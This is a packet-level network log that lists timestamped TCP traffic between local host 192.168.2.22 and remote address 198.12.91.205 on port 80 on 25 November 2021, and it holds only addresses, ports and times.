Nov 25, 2021 19:05:28.563019037 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.563023090 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.563046932 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.563052893 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.563071012 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.563075066 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.563083887 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.563092947 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.563101053 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.563113928 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.563126087 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.563137054 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.563138962 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.563158989 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.563170910 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.563180923 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.563184977 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.563204050 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.563215017 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.563237906 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.564471960 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.671562910 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671613932 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671633959 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671654940 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671677113 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671699047 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671720028 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671741009 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671757936 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671777010 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.671781063 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671796083 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671808958 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.671819925 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671821117 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.671835899 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671848059 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.671852112 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671854019 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.671869040 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671884060 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.671890974 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671905041 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.671907902 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671926975 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.671931028 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671947002 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671950102 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.671967030 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.671969891 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671988010 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.671989918 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.672005892 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.672010899 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.672024012 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.672029018 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.672044039 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.672053099 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.672064066 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.672075987 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.672086000 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.672099113 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.672113895 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.672122002 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.672144890 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.672144890 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.672162056 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.672179937 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.672190905 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.672204018 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.672226906 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.672245979 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.672271013 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.674279928 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.675643921 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.677671909 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677700043 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677723885 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677747965 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677762032 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.677768946 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677777052 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.677788973 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.677791119 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677807093 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.677813053 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677823067 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.677834034 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677851915 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.677855015 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677871943 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.677876949 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677887917 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.677897930 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677915096 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.677920103 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677931070 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.677941084 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677962065 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677978992 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.677982092 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.677983046 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678002119 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678003073 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678018093 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678024054 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678035975 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678045034 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678061962 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678065062 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678077936 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678086996 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678107023 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678107977 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678128958 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678131104 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678147078 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678149939 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678163052 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678170919 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678190947 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678193092 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678200960 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678212881 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678232908 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678234100 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678253889 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678260088 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678273916 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678278923 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678289890 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678294897 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678306103 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678314924 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678329945 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678334951 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678344965 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678354979 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678375006 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678390980 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678394079 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678406954 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678419113 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678431034 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678437948 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678442001 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678456068 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678462982 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678479910 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678483963 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678503990 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678504944 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678514957 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678525925 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678540945 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678546906 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678566933 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678566933 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678580999 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678587914 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678596973 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678611994 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678622961 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678632021 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678647041 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678653002 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678661108 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678673029 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678687096 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678694010 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678703070 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678715944 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678730011 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678736925 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678745985 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678759098 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678771973 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678780079 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678796053 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678802967 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678811073 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678826094 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678839922 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678847075 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678854942 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678869009 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678885937 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678890944 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678900003 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678911924 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678930044 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678932905 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678946018 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678957939 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678972960 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.678981066 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.678988934 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679004908 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679027081 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679037094 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679045916 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679047108 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679060936 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679065943 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679075003 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679088116 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679105997 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679111958 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679125071 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679135084 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679150105 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679158926 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679168940 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679183960 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679199934 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679207087 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679218054 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679229021 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679245949 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679251909 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679261923 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679280043 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679301977 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679323912 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679337978 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679353952 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679380894 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679404020 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679415941 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679425955 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679439068 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679446936 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679455996 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679470062 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679481983 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679491043 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679505110 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679513931 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679522991 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679537058 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679548979 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679559946 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679573059 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679583073 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679595947 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679615974 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679617882 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679641008 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679653883 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679666996 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679687023 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679698944 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679701090 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679707050 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679725885 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679748058 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679749966 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679760933 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679775000 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679786921 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679797888 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679812908 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679820061 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679831028 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679842949 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679855108 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679864883 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679877043 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679888964 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679892063 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679909945 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679924011 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679932117 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679939985 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679953098 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679965973 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679974079 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.679995060 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.679996967 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680005074 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680017948 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680031061 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680037975 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680046082 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680059910 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680073023 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680083036 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680088043 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680105925 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680115938 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680130005 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680144072 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680164099 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680172920 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680185080 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680200100 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680207014 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680228949 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680238962 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680249929 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680253029 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680265903 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680274010 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680294037 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680295944 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680311918 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680315018 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680329084 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680335999 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680356026 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680357933 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680373907 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680376053 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680391073 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680397987 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680411100 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680418968 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680428982 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680439949 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680454969 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680459976 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680474043 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680480957 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680490017 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680500984 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680516005 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680521965 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680536985 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680545092 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680567026 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680572987 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680588007 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680593967 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680608034 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680609941 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680625916 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680629969 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680639982 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680651903 CET	80	49165	198.12.91.205	192.168.2.22
